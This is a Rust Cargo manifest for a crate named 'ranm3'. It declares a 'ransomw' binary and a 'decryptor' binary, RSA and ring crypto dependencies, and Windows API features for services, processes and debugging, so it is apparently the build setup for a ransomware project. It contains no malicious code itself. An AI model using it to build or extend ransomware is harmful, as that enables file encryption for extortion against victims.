[package]
name = "ranm3"
version = "0.1.0"
edition = "2021"
build = "build.rs"

[profile.release]
lto = true

[features]
ransomw = []
decryptor = []

[[bin]]
name = "ransomw"
path = "src/main_ransomw.rs"
required-features = ["ransomw"]

[[bin]]
name = "decryptor"
path = "src/main_decryptor.rs"
required-features = ["decryptor"]

[dependencies]
digest = "0.10.7"
rand = "0.8"
rsa = "0.5"
sha2 = "0.10.8"
ring = "0.16.20" 
hex = "0.4"

[build-dependencies]
embed-resource = "1.6.2"
passwords = "3.1.16"

[target.'cfg(windows)'.dependencies]
winapi = { version = "0.3", features = ["shellapi","securitybaseapi", "winbase", "winerror", "fileapi", "errhandlingapi", "wincrypt", "handleapi", "minwindef", "winnt", "processthreadsapi", "debugapi", "sysinfoapi", "winuser", "minwinbase", "synchapi", "windef", "psapi", "winsvc"]}
widestring = "*"





